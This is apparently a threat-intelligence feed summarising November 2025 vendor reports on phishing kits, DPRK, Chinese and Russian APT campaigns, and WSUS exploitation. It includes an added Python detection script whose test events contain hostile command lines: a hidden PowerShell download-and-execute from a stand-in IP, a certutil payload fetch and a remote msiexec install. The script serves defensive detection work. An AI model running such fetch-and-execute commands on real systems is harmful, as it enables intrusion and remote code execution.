Researchers at CYFIRMA have identified Tycoon 2FA as an advanced and rapidly expanding Phishing-as-a-Service (PhaaS) platform that leverages Adversary-in-the-Middle (AiTM) techniques to steal user credentials and bypass multi-factor authentication. First observed in 2023, Tycoon 2FA enables threat actors to intercept authentication tokens in real time by proxying victims’ login requests through attacker-controlled servers. The service offers subscription-based access to phishing kits that emulate legitimate login portals for Microsoft 365, Gmail, and Outlook, using CAPTCHA gates, realistic validation steps, and deceptive error screens to evade detection and prolong victim interaction. Tycoon 2FA incorporates JavaScript obfuscation, Unicode-based code hiding, and browser fingerprinting to complicate analysis and reduce detection by automated tools. Its infrastructure employs rotating subdomains, encrypted payloads, and cross-origin data exfiltration mechanisms, ensuring resilience against static blocking.
Source: https://www.cyfirma.com/research/tycoon-2fa-a-technical-analysis-of-its-adversary-in-the-middle-phishing-operation/
2025-11-27
DPRK_Linked_Contagious_Interview_Campaign
HIGH
Intel Source:
Validin
Intel Name:
DPRK_Linked_Contagious_Interview_Campaign
Date of Scan:
2025-11-27
Impact:
HIGH
Summary:
Researchers at Validin have uncovered a new DPRK-linked campaign known as Contagious Interview, which leverages a deceptive recruitment platform called Lenny to target U.S.-based AI researchers, developers, and cryptocurrency professionals. The threat actors created a polished SaaS-style hiring website that closely resembles a legitimate AI job portal, complete with realistic workflows and branding. When victims begin the interview process, the site executes a clipboard-hijacking script that injects a malicious PowerShell command masquerading as a routine Microsoft driver update. This triggers a multi-stage, ClickFix-style infection chain that retrieves and executes additional payloads through PowerShell and VBScript. The campaign is designed to harvest intelligence, gain unauthorized system access, and enable potential financial theft through compromised cryptocurrency platforms.
Source: https://www.validin.com/blog/inside_dprk_fake_job_platform/
2025-11-26
Kimsuky_Health_Checkup_Email_Malware
HIGH
Intel Source:
Wezard4u
Intel Name:
Kimsuky_Health_Checkup_Email_Malware
Date of Scan:
2025-11-26
Impact:
HIGH
Summary:
Researchers at Dreaming Bluebird have identified a new phishing campaign attributed to the North Korean threat group Kimsuky, which leverages a malicious email attachment disguised as a health checkup guide. The infection begins when recipients open a compressed archive containing a file posing as a PDF that is in fact a JavaScript payload executed through Windows Script Host. This script decodes Base64-encoded content and stages secondary components in the ProgramData directory before invoking PowerShell commands for further payload execution. The second-stage DLL is run through rundll32.exe to maintain stealth and persistence. The malware employs AES-CBC encryption and Base64 encoding to protect its command-and-control communications, which are crafted to appear as legitimate Chrome browser traffic.
Source: https://wezard4u.tistory.com/429656
2025-11-26
Black_Friday_eCommerce_Fraud_Surge
MEDIUM
Intel Source:
Checkpoint
Intel Name:
Black_Friday_eCommerce_Fraud_Surge
Date of Scan:
2025-11-26
Impact:
MEDIUM
Summary:
Researchers at Check Point have identified a major rise in fraudulent eCommerce activity ahead of Black Friday 2025, driven by a surge in fake shopping sites and brand impersonation schemes. Threat actors used bulk domain registration and templated website generation to create convincing storefronts designed to steal credentials and financial information. They found that roughly one in every eleven newly registered Black Friday–themed domains was malicious, often blending geographic and time-based keywords to appear legitimate while impersonating well-known retailers. Many sites copied logos, layouts, and product images, including stolen or watermarked photos, and several campaigns targeted consumers in specific regions and languages. Although no direct link to AI was confirmed, the team warned that generative AI could soon accelerate and refine these fraud operations. Analysts observed more than 1,500 new brand-impersonating domains in October 2025, reflecting a significant month-over-month increase.
Source: https://blog.checkpoint.com/research/the-black-friday-cyber-crime-economy-surge-in-fraudulent-domains-and-ecommerce-scams/
2025-11-26
Kimsuky_and_Lazarus_Coordinated_Campaign
HIGH
Intel Source:
CN-SEC
Intel Name:
Kimsuky_and_Lazarus_Coordinated_Campaign
Date of Scan:
2025-11-26
Impact:
HIGH
Summary:
Purple Team researchers have uncovered that North Korean threat groups Kimsuky and Lazarus are conducting a coordinated campaign that blends espionage with financially motivated intrusions. Kimsuky initiates these operations using academic-themed phishing lures, such as fake conference invitations or collaboration requests, that carry malicious HWP or MSC files delivering the KLogEXE keylogger. This early-stage access allows the actors to profile victim systems and collect operational intelligence. Lazarus then leverages this intelligence to carry out follow-on attacks, deploying Node.js-based payloads and custom backdoors including FPSpy and InvisibleFerret, and exploiting the Windows zero-day CVE-2024-38193 to escalate privileges and steal cryptocurrency. Both groups operate on shared infrastructure, use domain-polling techniques to evade detection, and clean up artifacts to hide their tracks. Their joint campaign has targeted blockchain, diplomatic, and defense organizations in South Korea and internationally.
Source: https://cn-sec.com/archives/4704912.html
2025-11-25
Xillen_Stealer_v5_AI_Evasive_Infostealer
HIGH
Intel Source:
Darktrace
Intel Name:
Xillen_Stealer_v5_AI_Evasive_Infostealer
Date of Scan:
2025-11-25
Impact:
HIGH
Summary:
Researchers at Darktrace have identified a new version of the Python-based infostealer Xillen Stealer v5, which introduces advanced capabilities to evade AI-based detection systems. The malware targets sensitive data such as credentials, cryptocurrency wallets, and cloud configuration information across Windows, browser, and containerized environments. Xillen Stealer v5 incorporates multiple sophisticated modules, including a Rust-based polymorphic engine, behavioral mimicry, and container persistence to resist both static and behavioral detection. Its “AITargetDetection” module is designed to prioritize high-value victims—such as crypto traders, executives, and users in financially lucrative regions—using a rule-based targeting model.
Source: https://www.darktrace.com/blog/xillen-stealer-updates-to-version-5-to-evade-ai-detection
2025-11-25
South_Korea_Spear_Phishing_Surge
HIGH
Intel Source:
ASEC
Intel Name:
South_Korea_Spear_Phishing_Surge
Date of Scan:
2025-11-25
Impact:
HIGH
Summary:
Researchers at AhnLab Security Emergency Response Center (ASEC) have identified a surge in Advanced Persistent Threat (APT) campaigns targeting South Korea during October 2025, primarily leveraging spear phishing as the initial intrusion method. The observed attacks distributed malicious LNK and JSE attachments masquerading as legitimate inter-Korean cooperation or government-related documents to compromise victims. Two primary delivery mechanisms were reported: Type A, which used compressed archives to deploy RAT malware such as XenoRAT and RokRAT via PowerShell and cloud storage APIs, and Type B, which leveraged malicious AutoIt scripts to maintain persistence and execute remote commands. These campaigns demonstrated advanced social engineering, often exploiting politically sensitive lures related to North Korea, human rights, and national policy, indicating an espionage-driven objective.
Source: https://asec.ahnlab.com/en/91177/
2025-11-25
Qilin_and_Omnipotent_Financial_Data_Breaches
HIGH
Intel Source:
ASEC
Intel Name:
Qilin_and_Omnipotent_Financial_Data_Breaches
Date of Scan:
2025-11-25
Impact:
HIGH
Summary:
Researchers at AhnLab Security Emergency Response Center (ASEC) have identified two major cyber incidents in October 2025 impacting the global financial sector, involving large-scale data breaches and ransomware attacks. The first case involves a DarkForum actor known as omnipotent, who leaked a massive customer database belonging to an Indian life insurance company, marking one of the largest data exposures in the country's insurance industry. The breach contained extensive personal and financial details, posing significant risks of identity theft and fraud. The second incident centers on the Qilin ransomware group, also known as The Gentlemen, which targeted a Singapore-based financial IT service provider that supports hundreds of banks and FinTech companies across multiple continents. The attackers exfiltrated sensitive corporate data and attempted to extort the victim by threatening to publish the stolen information.
Source: https://asec.ahnlab.com/en/91174/
2025-11-24
ShadowPad_WSUS_RCE_Exploitation_Campaign
HIGH
Intel Source:
ASEC
Intel Name:
ShadowPad_WSUS_RCE_Exploitation_Campaign
Date of Scan:
2025-11-24
Impact:
HIGH
Summary:
Researchers at AhnLab Security Intelligence Center (ASEC) have identified an intrusion campaign leveraging a recently disclosed remote code execution vulnerability in Microsoft Windows Server Update Services (WSUS), tracked as CVE-2025-59287, to deliver the ShadowPad backdoor. The attackers exploited vulnerable WSUS servers to gain system-level access, employing PowerShell-based tools for initial compromise before deploying legitimate utilities such as certutil and curl to install the ShadowPad malware. ShadowPad, a modular backdoor linked to multiple Chinese state-sponsored APT groups, was executed through DLL sideloading to ensure stealth and persistence. The campaign demonstrates a rapid operational response to the public release of exploit code, indicating the threat actors’ advanced technical capability and resource coordination. Once established, ShadowPad enables remote command execution, data exfiltration, and long-term control of compromised systems.
Source: https://asec.ahnlab.com/en/91166/
2025-11-24
Pain_in_the_Mist_Navigating_DreamJob_Arsenal
HIGH
Intel Source:
Orange Cyberdefense
Intel Name:
Pain_in_the_Mist_Navigating_DreamJob_Arsenal
Date of Scan:
2025-11-24
Impact:
HIGH
Summary:
Researchers at Orange Cyberdefense have observed that in August 2025, their CyberSOC and CSIRT teams investigated an intrusion attributed with medium confidence to UNC2970, a North Korean threat cluster associated with Operation DreamJob. The attack targeted an Asian subsidiary of a European manufacturing firm through a WhatsApp lure impersonating a project manager job offer. The intrusion began with a ZIP file containing a malicious PDF, a legitimate SumatraPDF executable, and a DLL that was sideloaded when the PDF opened, triggering a BURNBOOK loader variant that decrypted and ran the MISTPEN backdoor in memory. Operators stayed active for roughly six hours, using compromised infrastructure for command and control while performing Active Directory enumeration, pass-the-hash movement, and deploying secondary payloads that led to a data collection module. The BURNBOOK sample aligned with earlier variants seen in 2024, functioning as a dropper and decryptor, while the MISTPEN variant showed overlap with previously documented loaders, using encrypted HTTP(S) communication, modular execution via defined opcodes, and built-in sleep routines. Both malware families relied heavily on sideloading legitimate software to avoid detection.
Source: https://www.orangecyberdefense.com/fileadmin/global/Blog/Navigating_Operation_DreamJob_s_arsenal_1.pdf
2025-11-24
An_Abuse_of_Velociraptor
HIGH
Intel Source:
Huntress
Intel Name:
An_Abuse_of_Velociraptor
Date of Scan:
2025-11-24
Impact:
HIGH
Summary:
Huntress researchers have identified active exploitation of a recently patched remote code execution vulnerability (CVE-2025-59287) in Windows Server Update Services (WSUS), which attackers used to gain initial access to enterprise environments. After compromise, the threat actors deployed Velociraptor, a legitimate open-source DFIR framework, to establish C2 across compromised endpoints. The attackers distributed malicious MSI packages hosted on s3[.]wasabisys[.]com, using them to install and configure Velociraptor agents that beaconed back to their C2 server. Once operational, the agents were used to run PowerShell payloads, execute remote commands, and perform extensive system and network reconnaissance.
Source: https://www.huntress.com/blog/velociraptor-misuse-part-one-wsus-up
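This entry and the ASEC ShadowPad entry above describe the same post-exploitation shape for CVE-2025-59287: the WSUS service spawns a shell or PowerShell, certutil or curl fetches the next stage, and an MSI (here, Velociraptor from Wasabi object storage) is installed as the foothold. The following is an added detection example, not code from Huntress or AhnLab. It runs stateless rules over process-creation events and then correlates per host. The WSUS parent process names (wsusservice.exe and the IIS worker w3wp.exe), the LOLBin list and the Velociraptor command-line shape are assumptions to validate against your own telemetry; the events, IPs (documentation range 203.0.113.0/24) and bucket path are constructed.

```python
import re
from dataclasses import dataclass

# Assumptions, not IOCs from the write-ups: the WSUS service binary and its IIS
# worker are the parents an exploited WSUS spawns from; a Velociraptor client
# runs as "velociraptor.exe --config <client.config.yaml> service run|install".
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "certutil.exe", "curl.exe",
           "msiexec.exe", "rundll32.exe", "mshta.exe", "bitsadmin.exe"}
DOWNLOADERS = {"certutil.exe", "curl.exe", "bitsadmin.exe"}
URL = re.compile(r"https?://[^\s\"']+", re.I)
VELO_ARGS = re.compile(r"\bservice\s+(install|run)\b|\bclient\b", re.I)

@dataclass
class Alert:
    rule: str
    host: str
    image: str
    detail: str

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def evaluate(event: dict) -> list:
    """Stateless rules over one process-creation event (Sysmon EID 1 / 4688 style)."""
    parent, image = basename(event.get("parent_image", "")), basename(event.get("image", ""))
    cmd, host = event.get("command_line", ""), event.get("host", "?")
    urls = URL.findall(cmd)
    alerts = []
    if parent in WSUS_PARENTS and image in LOLBINS:              # exploit child process
        alerts.append(Alert("wsus_child_lolbin", host, image, f"{parent} -> {image}: {cmd}"))
    if image in DOWNLOADERS and urls:                             # certutil/curl pulling a stage
        alerts.append(Alert("lolbin_download", host, image, urls[0]))
    if image == "msiexec.exe" and (urls or "wasabisys.com" in cmd.lower()):
        alerts.append(Alert("remote_msi_install", host, image, cmd))
    if "velociraptor" in image and VELO_ARGS.search(cmd):         # agent brought up as a service
        alerts.append(Alert("velociraptor_agent_install", host, image, cmd))
    return alerts

def run(events: list) -> list:
    return [a for e in events for a in evaluate(e)]

def correlate(alerts: list) -> list:
    """Hosts where a WSUS-spawned LOLBin is joined by an MSI pull or a Velociraptor client."""
    by_host = {}
    for a in alerts:
        by_host.setdefault(a.host, set()).add(a.rule)
    return sorted(h for h, rules in by_host.items()
                  if "wsus_child_lolbin" in rules
                  and rules & {"remote_msi_install", "velociraptor_agent_install"})

# Constructed events: four from the intrusion shape above, two benign.
SAMPLE_EVENTS = [
    {"host": "WSUS01", "parent_image": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": 'cmd.exe /c powershell -nop -w hidden -c "iwr http://203.0.113.10/s.ps1 | iex"'},
    {"host": "WSUS01", "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "command_line": r"certutil -urlcache -split -f http://203.0.113.10/v.msi C:\Windows\Temp\v.msi"},
    {"host": "WSUS01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "command_line": "msiexec.exe /i https://s3.wasabisys.com/example-bucket/velociraptor.msi /qn"},
    {"host": "WSUS01", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\Velociraptor\velociraptor.exe",
     "command_line": r'"C:\Program Files\Velociraptor\velociraptor.exe" --config '
                     r'"C:\Program Files\Velociraptor\client.config.yaml" service run'},
    {"host": "ADMIN01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell Get-Process"},
    {"host": "WSUS01", "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "command_line": "WmiPrvSE.exe -Embedding"},
]

if __name__ == "__main__":
    found = run(SAMPLE_EVENTS)
    for a in found:
        print(f"[{a.rule}] {a.host} {a.image}: {a.detail}")
    print("chained hosts:", correlate(found))
```

Two tuning notes. If Velociraptor is your own DFIR tool, allowlist by the server URL or the hash of your client.config.yaml rather than by binary name, otherwise the last rule fires on every legitimate enrolment. The first rule only sees direct children; when the exploit goes `wsusservice.exe -> cmd.exe -> powershell.exe`, the PowerShell event has cmd.exe as its parent, so pair this with a process-ancestry query in your SIEM or extend `evaluate` to take the grandparent when your telemetry records it.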
2025-11-24
Malicious_ConvertMate_PDF_Editor
HIGH
Intel Source:
Truesec
Intel Name:
Malicious_ConvertMate_PDF_Editor
Date of Scan:
2025-11-24
Impact:
HIGH
Summary:
Truesec researchers have identified a significant increase in detections involving a trojanized version of the PDF editor “ConvertMate,” active since November 19, 2025. Although the installer initially appears legitimate and is downloaded from conmateapp.com, it exhibits clear malicious behavior after execution, including unauthorized command execution and the establishment of persistence mechanisms. Once launched, the program initiates outbound connections to several external domains and drops multiple artifacts (updating_files.zip, native.zip, UpdateRetriever.exe, and conmate_update.ps1) used to maintain ongoing communication with attacker infrastructure. Persistence is maintained through scheduled PowerShell scripts that trigger network callbacks every 24 hours. The binaries are signed with a code-signing certificate issued to AMARYLLIS SIGNAL LTD, the same signer associated with the earlier PDFEditor malware campaign, indicating that this activity is likely an extension of that operation.
Source: https://www.truesec.com/hub/blog/reoccurring-use-of-highly-suspicious-pdf-editors-to-infiltrate-environments
2025-11-23
Autumn_Dragon_Espionage_Campaign
HIGH
Intel Source:
CyberArmor
Intel Name:
Autumn_Dragon_Espionage_Campaign
Date of Scan:
2025-11-23
Impact:
HIGH
Summary:
Researchers at CyberArmor have identified an ongoing espionage campaign called Autumn Dragon, attributed with medium confidence to a China-nexus APT active since early 2025. The operation targeted government and media organizations across Indonesia, Singapore, the Philippines, Cambodia, and Laos, focusing on intelligence tied to South China Sea developments. Initial access came through spearphishing attachments exploiting CVE-2025-8088 in WinRAR, using a malicious archive that deployed a batch dropper masquerading as a Windows Defender update script. This dropper retrieved staged payloads from cloud storage and executed them through PowerShell. The intrusion chain involved four stages: a WinRAR-based dropper, a Telegram-enabled backdoor using a modified libcef.dll sideloaded via a legitimate OBS executable, a loader abusing Adobe Creative Cloud binaries to decrypt and run shellcode, and a final HTTPS backdoor communicating with attacker infrastructure. Commands such as systeminfo, tasklist, schtasks, and screenshot indicated hands-on-keyboard activity. The campaign relied on DLL sideloading, legitimate application binaries, geo-restricted infrastructure, and Telegram traffic to avoid detection.
Source: https://cdn.prod.website-files.com/68cd99b1bd96b42702f97a39/691bf999a544b31f93edb11d_b6dc80485a86c3eeaed906c7ecf0cd7b_Autumn%20Dragon_%20China-nexus%20APT%20Group%20Target%20South%20East%20Asia.pdf
2025-11-23
Gamaredon_Lazarus_Joint_Ops
HIGH
Intel Source:
Gen Threat Labs
Intel Name:
Gamaredon_Lazarus_Joint_Ops
Date of Scan:
2025-11-23
Impact:
HIGH
Summary:
Researchers at Gen Threat Labs have identified rare evidence of cross-country collaboration between Russia’s Gamaredon and North Korea’s Lazarus advanced persistent threat (APT) groups. The investigation began after internal monitoring systems detected suspicious overlap between both actors’ activities through a shared command-and-control infrastructure. Subsequent analysis confirmed that a server previously attributed to Gamaredon was later found hosting a Lazarus malware variant, suggesting operational coordination or deliberate infrastructure sharing. This marks a potential first in observed Russian–North Korean cyber collaboration, signaling a deeper alignment of geopolitical and digital strategies. Gamaredon’s focus on espionage and disruption in support of Russian military objectives, combined with Lazarus’s financially motivated operations tied to North Korea’s economic agenda, underscores a fusion of capability and intent across both regimes.
Source: https://www.gendigital.com/blog/insights/research/apt-cyber-alliances-2025